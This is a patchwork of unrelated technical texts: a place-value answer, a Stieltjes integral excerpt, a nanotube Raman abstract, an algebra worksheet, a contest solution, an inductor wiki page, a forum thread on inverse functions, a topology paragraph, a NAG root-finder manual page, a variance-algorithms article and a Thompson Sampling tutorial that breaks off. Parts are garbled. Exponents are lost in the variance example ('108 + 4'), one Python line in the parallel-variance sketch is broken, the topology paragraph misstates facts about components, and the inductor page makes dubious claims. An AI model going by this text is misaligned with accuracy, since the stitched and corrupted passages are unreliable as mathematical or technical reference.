Note that: $74716 \\= 70,000 + 4,000 + 700 + 10 + 6 \\=(7\times 10000) + (4\times 1000) + (7 \times 100) +(1 \times 10) + (6 \times 1) \\=(7 \times 10^4) + (4 \times 10^3) + (7 \times 10^2) + (1 \times 10) + (6 \times 1)$ Thus, the missing expressions in the given statement (in order) are: $10^4; \\10^3; \\10^2; \\10; \\1$
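As a quick check (a sketch, not part of the textbook answer), the expansion can be verified directly:

digits = [7, 4, 7, 1, 6]
powers = [10**4, 10**3, 10**2, 10, 1]
print(sum(d * p for d, p in zip(digits, powers)))  # 74716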
|
|
# Stieltjes Integrals Considered as Lengths
• Karl Menger
Chapter
## Abstract
The Stieltjes integral
$$\int\limits_{a}^{b} f(x)\,dg(x) \qquad \text{or, briefly,} \qquad \int\limits_{a}^{b} f\,dg$$
is defined as follows: We divide the interval [a, b] into a finite number of intervals
$$a = x_0 < x_1 < \ldots < x_{n-1} < x_n = b.$$
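The excerpt breaks off at this point; the construction standardly continues by choosing points $\xi_i$ with $x_{i-1} \le \xi_i \le x_i$ and forming the approximating sums
$$\sum_{i=1}^{n} f(\xi_i)\,\bigl[\,g(x_i) - g(x_{i-1})\,\bigr],$$
whose limit, as the mesh of the subdivision tends to zero, defines the integral.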
|
|
• Corresponding author: Li Yan
### Surface-Enhanced Raman Spectroscopy of Carbon Nanotubes in Aqueous Solution
Niu Yang, Liu Qinghai, Yang Juan, Gao Dongliang, Qin Xiaojun, Luo Da, Zhang Zhenyu, Li Yan
1. Beijing National Laboratory for Molecular Sciences, Key Laboratory for the Physics and Chemistry of Nanodevices, State Key Laboratory of Rare Earth Materials Chemistry and Applications, Peking University, Beijing 100871, China
• Received:2012-05-11 Online:2012-07-28 Published:2012-06-19
• Supported by:
Project supported by the Ministry of Science and Technology of China (No. 2011CB933003) and the National Natural Science Foundation of China (Nos. 21125103, 11179011).
Carbon nanotubes (CNTs) exhibit intrinsic spectroscopic properties and are potential Raman and NIR fluorescence probes for bioimaging. However, the weak Raman intensity greatly obstructs such applications. Surface-enhanced Raman scattering (SERS) has been shown to be an effective way to increase the Raman signal. SERS has been widely studied for solid samples; however, the solid state is distinctly different from the environment in biosystems. Herein, we studied the SERS of Au-nanoparticle-decorated CNTs in aqueous solution, which offers an environment similar to biosystems. We found that the functionalization of CNTs with -SH groups can improve the attachment of Au nanoparticles on tube surfaces and thus benefit the SERS effect. Particle size is another important issue for SERS: particles of 50 nm show much stronger enhancement than those of 12 nm. The Raman intensity of CNTs increases with the concentration of Au nanoparticles. Hexamethylene diamine molecules can act as bi-linkers between Au nanoparticles, reducing the interparticle distance. This was proved by the red-shift of the band at ca. 540 nm and the appearance of a broad band around 700 nm in the absorption spectra of Au nanoparticles. Therefore the addition of hexamethylene diamine can further increase the Raman signal of CNTs through the strong coupling of the surface plasmons of Au nanoparticles with very small interparticle distances. Two commonly used small-molecule Raman probes, p-aminothiophenol and Rhodamine B, both show remarkably enhanced Raman intensity when added to the aqueous dispersion of Au/CNT hybrids. This shows that these Raman probe molecules can adsorb onto the Au/CNT hybrids and their Raman spectra can be greatly enhanced by the Au nanoparticles decorated on CNTs. Because various Raman bands from either CNTs or Raman probe molecules can be used for Raman imaging, this kind of Raman probe molecule/Au/CNT tri-component hybrid system may serve as a nanostructured platform for multiplexed Raman imaging based on the SERS effect.
|
|
Function and Algebra Concepts questions are available in the following grade levels:
# Function and Algebra Concepts Questions - All Grades
Create printable tests and worksheets from Function and Algebra Concepts questions. Select questions to add to a test using the checkbox above each question. Remember to click the add selected questions to a test button before moving to another page.
Grade 9 :: Algebraic Expressions by Barraza
Simplify the expression $6m + 10 - 10m$
1. $4m + 10$
2. $-4m + 10$
3. $16m + 10$
4. $6m$
Grade 9 :: Algebraic Expressions by Barraza
simplify -2 (3x + 6)
1. -6x - 12
2. -6x + 12
3. -18x
4. 6x - 12
Grade 9 :: Functions by Barraza
Simplify the following expression.
$3y^2 - 6y + 2 + 3y^2 + 8y$
1. $8y^2 +2$
2. $6y^2 +2 +14y$
3. $6y^2 + 2 - 14$
4. $6y^2 +2y + 2$
Grade 9 :: Linear Equations by rknight
Find the slope and y-intercept. 5x + 2y = -8
1. m = -5/2 and b = -4
2. m = -4 and b = -5
3. m = 5 and b = 2
4. m = 2 and b = 5
Grade 12 :: Function and Algebra Concepts by bscott22
$7/8$ as a decimal
1. 1.125
2. 0.625
3. 0.875
4. 1.25
Grade 6 :: Algebraic Expressions by LBeth
Which expression represents "$y$ less than one-half"?
1. $y + 1/2$
2. $y - 1/2$
3. $1/2 + y$
4. $1/2 - y$
Grade 9 :: Algebraic Expressions by Barraza
Which of the following is showing like terms?
1. $-3 , -6x, -9y, -10z$
2. $x, 5x, 6xy, 10x^2$
3. $5y, 5x, 5z, 5m$
4. $y, -8y, .7y, -100y$
Grade 3 :: Inequalities by LBeth
Which correctly compares the pictures?
1. $4>2$
2. $4<2$
3. $4 = 2$
Grade 3 :: Inequalities by LBeth
Which correctly compares the pictures?
1. $3>4$
2. $3<4$
3. $3=4$
Grade 9 :: Algebraic Expressions by Barraza
$3y + 8$ is an example of a
1. monomial
2. binomial
3. trinomial
4. polynomial
Grade 6 :: Inequalities by Piddydink
Greater than or equal to
1. $<=$
2. $>$
3. $<$
4. $>=$
|
|
# University of South Carolina High School Math Contest/1993 Exam/Problem 26
## Problem
Let $n=1667$. Then the first nonzero digit in the decimal expansion of $\sqrt{n^2 + 1} - n$ is
$\mathrm{(A) \ }1 \qquad \mathrm{(B) \ }2 \qquad \mathrm{(C) \ }3 \qquad \mathrm{(D) \ }4 \qquad \mathrm{(E) \ }5$
## Solution
The given expression is between 0 and 1, so we only need to worry about the decimal expansion of $\sqrt{n^{2}+1}$ and ignore the integer part of the result. Using the extended Binomial Theorem, $(1667^{2}+1)^{1/2} = \displaystyle {1/2\choose 0} (1667) + {1/2\choose 1} \left(\frac 1{1667}\right) + \cdots$. Now we only have to look at the second term, since all the following terms will be too small to affect the first nonzero digit of the decimal expansion. We see that $\frac{1}{2 \cdot 1667}=.00029\ldots$. The answer is $2$.
Alternatively, if you don't know the extended binomial theorem, we can say $\sqrt{n^2 + 1} - n = \epsilon$. Then $\sqrt{n^2 + 1} = n + \epsilon$ so $n^2 + 1 = n^2 + 2n\epsilon + \epsilon^2$, so $\epsilon^2 + 2n\epsilon = 1$. Because $n$ is large, $\epsilon$ is very small, so if we write $\epsilon = \frac{1}{2n} - \frac{\epsilon^2}{2n}$, we may disregard the second term. The result follows as in the previous solution.
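A quick numerical sanity check of either solution (my own sketch, using Python's decimal module for extra precision):

from decimal import Decimal, getcontext

getcontext().prec = 30
n = 1667
eps = Decimal(n * n + 1).sqrt() - n
print(eps)  # about 0.0002999..., so the first nonzero digit is 2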
|
|
# Circuit Theory/Inductors
An inductor is a coil of wire that stores energy in the form of a magnetic field. The magnetic field depends on current flowing to "store energy."
If the current stops, the magnetic field collapses and creates a spark in the device that is opening the circuit. The large generators found in electricity generation can create huge currents, and turning them off can be dangerous (MIT EMF YouTube video). There is no danger in simply storing them, however.
### Inductance
Inductance is the capacity of an inductor to store energy in the form of a magnetic field. Inductance is measured in units called "henries," abbreviated with a capital "H," and the variable associated with inductance is "L".
Inductance is the ratio of magnetic flux (symbol ${\displaystyle \Phi _{B}}$) to current:
${\displaystyle L=\Phi _{B}/i}$
${\displaystyle \Phi _{B}}$ measures the strength of a magnetic field just like charge measures the strength of an electric field.
### Inductor Terminal Relation
The relationship between inductance, current, and voltage through an inductor is given by the formula:
${\displaystyle v=L{\frac {di}{dt}}}$
### Inductor Safety
Inductors found in power plants can store energy, but ordinary inductors at room temperature will not hold energy once the current stops. An isolated inductor in storage cannot kill someone the way a charged capacitor can.
Inductors do cause problems. The first is economic: a good inductor is much more expensive than a capacitor, and in some situations a collection of other components can replace an inductor at less cost. Typical inductors are built with copper, which increases in cost as its supply on earth dwindles.
Inductors can create spikes and sparks (video) when turning off that can destroy other electrical components. They can destroy switches. They can vaporize metal.
The biggest inductors at room temperature are found in electric motors. When motors are turned on or off, they create what is called a "back EMF"; ideally, back EMF is a voltage spike of infinite voltage. Diodes, capacitors, and resistors are used to turn the back EMF into heat on discharge, although this may make starting up the motor a problem. Some electronic speed controllers (ESCs) in UAVs and quadcopters deliberately pulse the motor and measure the back EMF to figure out which direction the motor is going to spin in. This reduces the need for Hall-effect probes and thus reduces the cost of the motor.
### Inductor Example
Question: Given the current through a 10mH inductor is ${\displaystyle i(t)=5t*e^{-1000t}}$ amps, what is the voltage?
Solution: No need to know the initial conditions because the solution is a derivative: ${\displaystyle v(t)=Ldi/dt}$.
Using Wolfram Alpha, the solution is ${\displaystyle v(t)=.01*e^{-1000t}(5-5000t)}$ volts.
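The derivative can also be checked symbolically; a minimal sketch assuming SymPy is available:

import sympy as sp

t = sp.symbols('t', positive=True)
L = sp.Rational(1, 100)            # 10 mH
i = 5 * t * sp.exp(-1000 * t)      # current in amperes
v = sp.simplify(L * sp.diff(i, t))
print(v)  # (1/20 - 50*t)*exp(-1000*t), i.e. 0.01*e^(-1000t)*(5 - 5000t) volts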
|
|
# How do we do the inverse of y=(x-1)^2?
1. May 8, 2005
### cmab
How do we do the inverse of y=(x-1)^2?
Would it be x = sqrt(y) +1 ?
2. May 8, 2005
### Jameson
Let's see.
$$y = (x-1)^2$$
Now switching x and y we get
$$x = (y-1)^2$$
$$\sqrt{x} = y - 1$$
$$y = \sqrt{x} + 1$$
When you find inverses, you usually want to put the inverse in terms of the given variable if possible. Sometimes, as you'll see, it is quite impossible.
Example: Find the inverse of $$y = x^3-x$$
Jameson
3. May 8, 2005
### cmab
but in my problem, it must have respect to y....
How about the reciprocal of x=2, would it be y=2 ? Just swapping the variable.
4. Jul 21, 2010
### dimitri151
Re: Reciprocal
The issue with finding the inverse of x=2 is that x=2 isn't a function. A function is a set of ordered pairs from one set to another; x=2 only refers to one element of one set. Furthermore, if you want your function to have an inverse, the rule has to meet other requirements: it has to be bijective, which means it has to be both injective and surjective. Hence $$y = x^3-x$$
has no inverse since solving for x gives multiple functions.
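To illustrate that last point (a sketch of my own, not part of the thread), solving $y = x^3 - x$ for $x$ symbolically returns three branches, so no single inverse function exists:

import sympy as sp

x, y = sp.symbols('x y')
branches = sp.solve(sp.Eq(y, x**3 - x), x)
print(len(branches))  # 3 -- the map is not injective, hence not invertible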
|
|
A topological space $X$ is said to be disconnected if it is the union of two disjoint nonempty open sets; a subset of $X$ is a connected set if it is a connected space when viewed as a subspace of $X$. $X$ is path-connected if there is a path joining any two points in $X$, and the pathwise-connected component containing $x$ is the set of all points that can be joined to $x$ by a path. The connected components of a space are disjoint unions of the path-connected components (which in general are neither open nor closed); each equivalence class is a maximal connected subspace of $X$, and being in the same component is an equivalence relation. The continuous image of a connected space is connected. Graphs have path connected subsets, namely those subsets for which every pair of points has a path of edges joining them. But it is not always possible to find a topology on the set of points which induces the same connected sets. To wit, there is a category of connective spaces consisting of sets with collections of connected subsets satisfying connectivity axioms; their morphisms are those functions which map connected sets to connected sets (Muscat & Buhagiar 2006).
|
|
# NAG Library Routine Document
## 1 Purpose
c05ayf locates a simple zero of a continuous function in a given interval using Brent's method, which is a combination of nonlinear interpolation, linear extrapolation and bisection.
## 2 Specification
Fortran Interface
Subroutine c05ayf (a, b, eps, eta, f, x, iuser, ruser, ifail)
Integer, Intent (Inout) :: iuser(*), ifail
Real (Kind=nag_wp), External :: f
Real (Kind=nag_wp), Intent (In) :: a, b, eps, eta
Real (Kind=nag_wp), Intent (Inout) :: ruser(*)
Real (Kind=nag_wp), Intent (Out) :: x
#include <nagmk26.h>
void c05ayf_ (const double *a, const double *b, const double *eps, const double *eta, double (NAG_CALL *f)(const double *x, Integer iuser[], double ruser[]), double *x, Integer iuser[], double ruser[], Integer *ifail)
## 3 Description
c05ayf attempts to obtain an approximation to a simple zero of the function $f\left(x\right)$ given an initial interval $\left[a,b\right]$ such that $f\left(a\right)×f\left(b\right)\le 0$. The same core algorithm is used by c05azf whose specification should be consulted for details of the method used.
The approximation $x$ to the zero $\alpha$ is determined so that at least one of the following criteria is satisfied:
(i) $\left|x-\alpha \right|\le {\mathbf{eps}}$, (ii) $\left|f\left(x\right)\right|\le {\mathbf{eta}}$.
## 4 References
Brent R P (1973) Algorithms for Minimization Without Derivatives Prentice–Hall
## 5 Arguments
1: $\mathbf{a}$ – Real (Kind=nag_wp)Input
On entry: $a$, the lower bound of the interval.
2: $\mathbf{b}$ – Real (Kind=nag_wp)Input
On entry: $b$, the upper bound of the interval.
Constraint: ${\mathbf{b}}\ne {\mathbf{a}}$.
3: $\mathbf{eps}$ – Real (Kind=nag_wp)Input
On entry: the termination tolerance on $x$ (see Section 3).
Constraint: ${\mathbf{eps}}>0.0$.
4: $\mathbf{eta}$ – Real (Kind=nag_wp)Input
On entry: a value such that if $\left|f\left(x\right)\right|\le {\mathbf{eta}}$, $x$ is accepted as the zero. eta may be specified as $0.0$ (see Section 7).
5: $\mathbf{f}$ – real (Kind=nag_wp) Function, supplied by the user.External Procedure
f must evaluate the function $f$ whose zero is to be determined.
The specification of f is:
Fortran Interface
Function f (x, iuser, ruser)
Real (Kind=nag_wp) :: f
Integer, Intent (Inout) :: iuser(*)
Real (Kind=nag_wp), Intent (In) :: x
Real (Kind=nag_wp), Intent (Inout) :: ruser(*)
#include <nagmk26.h>
double f (const double *x, Integer iuser[], double ruser[])
1: $\mathbf{x}$ – Real (Kind=nag_wp)Input
On entry: the point at which the function must be evaluated.
2: $\mathbf{iuser}\left(*\right)$ – Integer arrayUser Workspace
3: $\mathbf{ruser}\left(*\right)$ – Real (Kind=nag_wp) arrayUser Workspace
f is called with the arguments iuser and ruser as supplied to c05ayf. You should use the arrays iuser and ruser to supply information to f.
f must either be a module subprogram USEd by, or declared as EXTERNAL in, the (sub)program from which c05ayf is called. Arguments denoted as Input must not be changed by this procedure.
Note: f should not return floating-point NaN (Not a Number) or infinity values, since these are not handled by c05ayf. If your code inadvertently does return any NaNs or infinities, c05ayf is likely to produce unexpected results.
6: $\mathbf{x}$ – Real (Kind=nag_wp)Output
On exit: if ${\mathbf{ifail}}={\mathbf{0}}$ or ${\mathbf{2}}$, x is the final approximation to the zero. If ${\mathbf{ifail}}={\mathbf{3}}$, x is likely to be a pole of $f\left(x\right)$. Otherwise, x contains no useful information.
7: $\mathbf{iuser}\left(*\right)$ – Integer arrayUser Workspace
8: $\mathbf{ruser}\left(*\right)$ – Real (Kind=nag_wp) arrayUser Workspace
iuser and ruser are not used by c05ayf, but are passed directly to f and may be used to pass information to this routine.
9: $\mathbf{ifail}$ – IntegerInput/Output
On entry: ifail must be set to $0$, $-1\text{ or }1$. If you are unfamiliar with this argument you should refer to Section 3.4 in How to Use the NAG Library and its Documentation for details.
For environments where it might be inappropriate to halt program execution when an error is detected, the value $-1\text{ or }1$ is recommended. If the output of error messages is undesirable, then the value $1$ is recommended. Otherwise, if you are not familiar with this argument, the recommended value is $0$. When the value $-\mathbf{1}\text{ or }\mathbf{1}$ is used it is essential to test the value of ifail on exit.
On exit: ${\mathbf{ifail}}={\mathbf{0}}$ unless the routine detects an error or a warning has been flagged (see Section 6).
## 6 Error Indicators and Warnings
If on entry ${\mathbf{ifail}}=0$ or $-1$, explanatory error messages are output on the current error message unit (as defined by x04aaf).
Errors or warnings detected by the routine:
${\mathbf{ifail}}=1$
On entry, ${\mathbf{a}}=〈\mathit{\text{value}}〉$ and ${\mathbf{b}}=〈\mathit{\text{value}}〉$.
Constraint: ${\mathbf{a}}\ne {\mathbf{b}}$.
On entry, ${\mathbf{eps}}=〈\mathit{\text{value}}〉$.
Constraint: ${\mathbf{eps}}>0.0$.
On entry, ${\mathbf{f}}\left({\mathbf{a}}\right)$ and ${\mathbf{f}}\left({\mathbf{b}}\right)$ have the same sign with neither equalling $0.0$: ${\mathbf{f}}\left({\mathbf{a}}\right)=〈\mathit{\text{value}}〉$ and ${\mathbf{f}}\left({\mathbf{b}}\right)=〈\mathit{\text{value}}〉$.
${\mathbf{ifail}}=2$
No further improvement in the solution is possible. eps is too small: ${\mathbf{eps}}=〈\mathit{\text{value}}〉$. The final value of x returned is an accurate approximation to the zero.
${\mathbf{ifail}}=3$
The function values in the interval $\left[{\mathbf{a}},{\mathbf{b}}\right]$ might contain a pole rather than a zero. Reducing eps may help in distinguishing between a pole and a zero.
${\mathbf{ifail}}=-99$
See Section 3.9 in How to Use the NAG Library and its Documentation for further information.
${\mathbf{ifail}}=-399$
Your licence key may have expired or may not have been installed correctly.
See Section 3.8 in How to Use the NAG Library and its Documentation for further information.
${\mathbf{ifail}}=-999$
Dynamic memory allocation failed.
See Section 3.7 in How to Use the NAG Library and its Documentation for further information.
## 7 Accuracy
The levels of accuracy depend on the values of eps and eta. If full machine accuracy is required, they may be set very small, resulting in an exit with ${\mathbf{ifail}}={\mathbf{2}}$, although this may involve many more iterations than a lesser accuracy. You are recommended to set ${\mathbf{eta}}=0.0$ and to use eps to control the accuracy, unless you have considerable knowledge of the size of $f\left(x\right)$ for values of $x$ near the zero.
## 8 Parallelism and Performance
c05ayf is not threaded in any implementation.
## 9 Further Comments
The time taken by c05ayf depends primarily on the time spent evaluating f (see Section 5).
If it is important to determine an interval of relative length less than $2×{\mathbf{eps}}$ containing the zero, or if f is expensive to evaluate and the number of calls to f is to be restricted, then use of c05azf is recommended. Use of c05azf is also recommended when the structure of the problem to be solved does not permit a simple f to be written: the reverse communication facilities of c05azf are more flexible than the direct communication of f required by c05ayf.
## 10 Example
This example calculates an approximation to the zero of ${e}^{-x}-x$ within the interval $\left[0,1\right]$ using a tolerance of ${\mathbf{eps}}=\text{1.0E−5}$.
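For readers without NAG access, here is a rough Python analogue of this example (scipy.optimize.brentq is not the NAG routine, but implements the same Brent-type bracketing method):

from math import exp
from scipy.optimize import brentq

root = brentq(lambda x: exp(-x) - x, 0.0, 1.0, xtol=1.0e-5)
print(root)  # about 0.56714, the zero of exp(-x) - x in [0, 1]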
### 10.1 Program Text
Program Text (c05ayfe.f90)
### 10.2 Program Data
None.
### 10.3 Program Results
Program Results (c05ayfe.r)
© The Numerical Algorithms Group Ltd, Oxford, UK. 2017
|
|
# Algorithms for calculating variance
Algorithms for calculating variance play a major role in statistical computing. A key problem in the design of good algorithms for this problem is that formulas for the variance may involve sums of squares, which can lead to numerical instability as well as to arithmetic overflow when dealing with large values.
## I. Naïve algorithm
The formula for calculating the variance of an entire population of size n is:
$\sigma^2 = \displaystyle\frac{\sum_{i=1}^{n} x_i^2 - \left(\sum_{i=1}^{n} x_i\right)^2/n}{n}.$
The formula for calculating an unbiased estimate of the population variance from a finite sample of n observations is:
$s^2 = \displaystyle\frac{\sum_{i=1}^{n} x_i^2 - \left(\sum_{i=1}^{n} x_i\right)^2/n}{n-1}.$
Therefore a naive algorithm to calculate the estimated variance is given by the following pseudocode:
`n = 0`
`sum = 0`
`sum_sqr = 0`
`foreach x in data:`
` n = n + 1`
` sum = sum + x`
` sum_sqr = sum_sqr + x*x`
`end for`
`mean = sum/n`
`variance = (sum_sqr - sum*mean)/(n - 1)`
This algorithm can easily be adapted to compute the variance of a finite population: simply divide by n instead of n − 1 on the last line.
Because `sum_sqr` and `sum * mean` can be very similar numbers, the precision of the result can be much less than the inherent precision of the floating-point arithmetic used to perform the computation. This is particularly bad if the variance is small relative to the sum of the numbers.
## II. Two-pass algorithm
An alternate approach, using a different formula for the variance, is given by the following pseudocode:
`n = 0`
`sum1 = 0`
`foreach x in data:`
` n = n + 1`
` sum1 = sum1 + x`
`end for`
`mean = sum1/n`
`sum2 = 0`
`foreach x in data:`
` sum2 = sum2 + (x - mean)^2`
`end for`
`variance = sum2/(n - 1)`
This algorithm is often more numerically reliable than the naïve algorithm I for large sets of data, although it can be worse if much of the data is very close to but not precisely equal to the mean and some are quite far away from it.
The results of both of these simple algorithms (I and II) can depend inordinately on the ordering of the data and can give poor results for very large data sets due to repeated roundoff error in the accumulation of the sums. Techniques such as compensated summation can be used to combat this error to a degree.
### IIa. Compensated variant
The compensated-summation version of the algorithm above reads:
`n = 0`
`sum1 = 0`
`foreach x in data:`
` n = n + 1`
` sum1 = sum1 + x`
`end for`
`mean = sum1/n`
`sum2 = 0`
`sumc = 0`
`foreach x in data:`
` sum2 = sum2 + (x - mean)^2`
` sumc = sumc + (x - mean)`
`end for`
`variance = (sum2 - sumc^2/n)/(n - 1)`
## III. On-line algorithm
It is often useful to be able to compute the variance in a single pass, inspecting each value $x_i$ only once; for example, when the data are being collected without enough storage to keep all the values, or when costs of memory access dominate those of computation. For such an online algorithm, a recurrence relation is required between quantities from which the required statistics can be calculated in a numerically stable fashion.
The following formulas can be used to update the mean and (estimated) variance of the sequence, for an additional element $x_{\mathrm{new}}$. Here, $m$ denotes the estimate of the population mean (using the sample mean), $s^2_{n-1}$ the estimate of the population variance, $s^2_n$ the estimate of the sample variance, and $n$ the number of elements in the sequence before the addition.
$m_{\mathrm{new}} = \frac{n\, m_{\mathrm{old}} + x_{\mathrm{new}}}{n+1} = m_{\mathrm{old}} + \frac{x_{\mathrm{new}} - m_{\mathrm{old}}}{n+1}$
$s^2_{n-1,\mathrm{new}} = \frac{(n-1)\, s^2_{n-1,\mathrm{old}} + (x_{\mathrm{new}} - m_{\mathrm{new}})\,(x_{\mathrm{new}} - m_{\mathrm{old}})}{n}, \qquad n > 0$
$s^2_{n,\mathrm{new}} = \frac{n\, s^2_{n,\mathrm{old}} + (x_{\mathrm{new}} - m_{\mathrm{new}})\,(x_{\mathrm{new}} - m_{\mathrm{old}})}{n+1}.$
It turns out that a more suitable quantity for updating is the sum of squares of differences from the (current) mean, $\sum_{i=1}^n (x_i - m)^2$, here denoted $M_2$:
$M_{2,\mathrm{new}} = M_{2,\mathrm{old}} + (x_{\mathrm{new}} - m_{\mathrm{old}})(x_{\mathrm{new}} - m_{\mathrm{new}})$
$s^2_n = \frac{M_2}{n}$
$s^2_{n-1} = \frac{M_2}{n-1}$
A numerically stable algorithm is given below. It also computes the mean. This algorithm is due to Knuth, who cites Welford.
`n = 0`
`mean = 0`
`M2 = 0`
`foreach x in data:`
` n = n + 1`
` delta = x - mean`
` mean = mean + delta/n`
` M2 = M2 + delta*(x - mean) // This expression uses the new value of mean`
`end for`
`variance_n = M2/n`
`variance = M2/(n - 1)`
This algorithm is much less prone to loss of precision due to massive cancellation, but might not be as efficient because of the division operation inside the loop. For a particularly robust two-pass algorithm for computing the variance, first compute and subtract an estimate of the mean, and then use this algorithm on the residuals.
A slightly more convenient form allows one to calculate the standard deviation without having to explicitly calculate the new mean. If $n$ is the number of elements in the sequence after the addition of the new element, then one has
$s^2_{n-1,\mathrm{new}} = \frac{(n-2)\, s^2_{n-1,\mathrm{old}} + \frac{n-1}{n}\left(x_{\mathrm{new}} - m_{\mathrm{old}}\right)^2}{n-1}$
## IV. Weighted incremental algorithm
When the observations are weighted, West (1979) suggests this incremental algorithm:
`n = 0`
`foreach x, weight in the data:`
` if n=0 then`
` n = 1`
` mean = x`
` S = 0`
` sumweight = weight`
` else`
` n = n + 1`
` temp = weight + sumweight`
` S = S + sumweight*weight*(x-mean)^2 / temp`
` mean = mean + (x-mean)*weight / temp`
` sumweight = temp`
` end if`
`end for`
`Variance = S * n / ((n-1) * sumweight) // if sample is the population, omit n/(n-1)`
## V. Parallel algorithm
Chan et al. note that the above on-line algorithm III is a special case of an algorithm that works for any partition of the sample $X$ into sets $X^A$, $X^B$:
$\delta = m^B - m^A$
$m^X = m^A + \delta\cdot\frac{N^B}{N^X}$
$M_2^X = M_2^A + M_2^B + \delta^2\cdot\frac{N^A N^B}{N^X}$.
This may be useful when, for example, multiple processing units may be assigned to discrete parts of the input.
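A small Python sketch (variable names are mine) of this pairwise combination of (count, mean, M2) summaries:
`def combine(n_a, mean_a, M2_a, n_b, mean_b, M2_b):`
` delta = mean_b - mean_a`
` n_x = n_a + n_b`
` mean_x = mean_a + delta * n_b / n_x`
` M2_x = M2_A + M2_B + delta**2 * n_a * n_b / n_x if False else M2_a + M2_b + delta**2 * n_a * n_b / n_x`
` return n_x, mean_x, M2_x`
Combining the summaries of (4, 7) and (13, 16) this way yields mean 10 and $M_2 = 90$, i.e. variance $90/3 = 30$, matching the full sample.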
### Higher-order statistics
Terriberry extends Chan's formulae to calculating the third and fourth central moments, needed for example when estimating skewness and kurtosis:
$M_3^X = M_3^A + M_3^B + \delta^3\,\frac{N^A N^B (N^A - N^B)}{(N^X)^2} + 3\,\delta\,\frac{N^A M_2^B - N^B M_2^A}{N^X}$
$M_4^X = M_4^A + M_4^B + \delta^4\,\frac{N^A N^B \left((N^A)^2 - N^A N^B + (N^B)^2\right)}{(N^X)^3} + 6\,\delta^2\,\frac{(N^A)^2 M_2^B + (N^B)^2 M_2^A}{(N^X)^2} + 4\,\delta\,\frac{N^A M_3^B - N^B M_3^A}{N^X}$
Here the $M_k$ are again the sums of powers of differences from the mean $\sum (x - \overline{x})^k$, giving
skewness: $g_1 = \frac{\sqrt{n}\, M_3}{M_2^{3/2}},$
kurtosis: $g_2 = \frac{n\, M_4}{M_2^2}.$
For the incremental case (i.e., $B = \{x\}$), this simplifies to:
$\delta = x - m$
$m' = m + \frac{\delta}{n}$
$M_2' = M_2 + \delta^2\, \frac{n-1}{n}$
$M_3' = M_3 + \delta^3\, \frac{(n-1)(n-2)}{n^2} - \frac{3\,\delta\, M_2}{n}$
$M_4' = M_4 + \frac{\delta^4 (n-1)(n^2 - 3n + 3)}{n^3} + \frac{6\,\delta^2 M_2}{n^2} - \frac{4\,\delta\, M_3}{n}$
It should be noted that by preserving the value $\delta/n$, only one division operation is needed, and thus the higher-order statistics can be calculated for little incremental cost.
## Example
Assume that all floating point operations use the standard IEEE 754 double-precision arithmetic. Consider the sample (4, 7, 13, 16) from an infinite population. Based on this sample, the estimated population mean is 10, and the unbiased estimate of population variance is 30. Both Algorithm I and Algorithm II compute these values correctly. Next consider the sample (108 + 4, 108 + 7, 108 + 13, 108 + 16), which gives rise to the same estimated variance as the first sample. Algorithm II computes this variance estimate correctly, but Algorithm I returns 29.333333333333332 instead of 30. While this loss of precision may be tolerable and viewed as a minor flaw of Algorithm I, it is easy to find data that reveal a major flaw in the naive algorithm: Take the sample to be (109 + 4, 109 + 7, 109 + 13, 109 + 16). Again the estimated population variance of 30 is computed correctly by Algorithm II, but the naive algorithm now computes it as −170.66666666666666. This is a serious problem with Algorithm I, since the variance can, by definition, never be negative.
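The failure of Algorithm I on shifted data is easy to reproduce (a sketch; exact outputs depend on the platform's double-precision rounding):
`def naive_variance(data): # Algorithm I`
` n, s, s2 = 0, 0.0, 0.0`
` for x in data:`
`  n += 1; s += x; s2 += x*x`
` return (s2 - s*(s/n))/(n - 1)`
`def two_pass_variance(data): # Algorithm II`
` mean = sum(data)/len(data)`
` return sum((x - mean)**2 for x in data)/(len(data) - 1)`
`sample = [1e9 + 4, 1e9 + 7, 1e9 + 13, 1e9 + 16]`
`print(naive_variance(sample)) # far from 30; can even be negative`
`print(two_pass_variance(sample)) # 30.0`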
|
|
# Thompson Sampling for Contextual bandits
Thompson Sampling is a very simple yet effective method to addressing the exploration-exploitation dilemma in reinforcement/online learning. In this series of posts, I’ll introduce some applications of Thompson Sampling in simple examples, trying to show some cool visuals along the way. All the code can be found on my GitHub page here.
In this post, we expand our Multi-Armed Bandit setting such that the expected rewards $\theta$ can depend on an external variable. This scenario is known as the Contextual bandit.
## The Contextual Bandit
The Contextual Bandit is just like the Multi-Armed bandit problem but now the true expected reward parameter $\theta_k$ depends on external variables. Therefore, we add the notion of context or state to support our decision.
Thus, we’re going to suppose that the probabilty of reward now is of the form
$\theta_k(x) = \frac{1}{1 + exp(-f(x))}$
where
$f(x) = \beta_0 + \beta_1 \cdot x + \epsilon$
and $\epsilon \sim \mathcal{N}(0, \sigma^2)$. In other words, the expected reward parameter for each bandit depends linearly on an external variable $x$ through a logistic link. Let us implement this in Python:
import numpy as np

# class to implement our contextual bandit setting
class ContextualMAB:
    # initialization
    def __init__(self):
        # we build two bandits
        self.weights = {}
        self.weights[0] = [0.0, 1.6]
        self.weights[1] = [0.0, 0.4]

    # method for acting on the bandits
    def draw(self, k, x):
        # probability dict
        prob_dict = {}
        # loop for each bandit
        for bandit in self.weights.keys():
            # linear function of external variable
            f_x = self.weights[bandit][0] + self.weights[bandit][1]*x
            # generate reward with probability given by the logistic
            probability = 1/(1 + np.exp(-f_x))
            # appending to dict
            prob_dict[bandit] = probability
        # give reward according to probability
        return (np.random.choice([0, 1], p=[1 - prob_dict[k], prob_dict[k]]),
                max(prob_dict.values()) - prob_dict[k],
                prob_dict[k])
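A quick usage sketch (my own, not from the original post): draw returns the sampled reward, the instantaneous regret of the chosen arm, and the chosen arm’s true reward probability.
cmab = ContextualMAB()
reward, regret, p = cmab.draw(0, 1.0)   # pull Bandit 0 in context x = 1.0
print(reward, regret, round(p, 3))      # p is about 0.832 for these weights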
Let us visualize how the contextual MAB setting will work. First, let us see how the bandit probabilities depend on $x$. We set $\beta_0 = 0$ for both bandits, and $\beta_1 = 1.6$ for Bandit 0 and $\beta_1 = 0.4$ for Bandit 1.
The plot shows us that an ideal strategy would select Bandit 0 if $x$ is greater than 0, and Bandit 1 if $x$ is less than 0. In the following plot, we show the bandits rewards over time depending on $x$ varying like a sine wave. The green and red shaded areas show the best action at each round.
We can see that more rewards pop up for Bandit 0 when $x$ is positive. Conversely, when $x$ is negative, Bandit 1 gives more rewards than Bandit 0. Let us implement an $\epsilon$-greedy policy and Thompson Sampling to solve this problem and compare their results.
## Algorithm 1: $\epsilon$-greedy with regular Logistic Regression
Let us implement a regular logistic regression, and use an $\epsilon$-greedy policy to choose which bandit to activate. We try to learn the expected reward function for each bandit:
$\theta_k(x) = \frac{1}{1 + exp(-f(x))}$
where
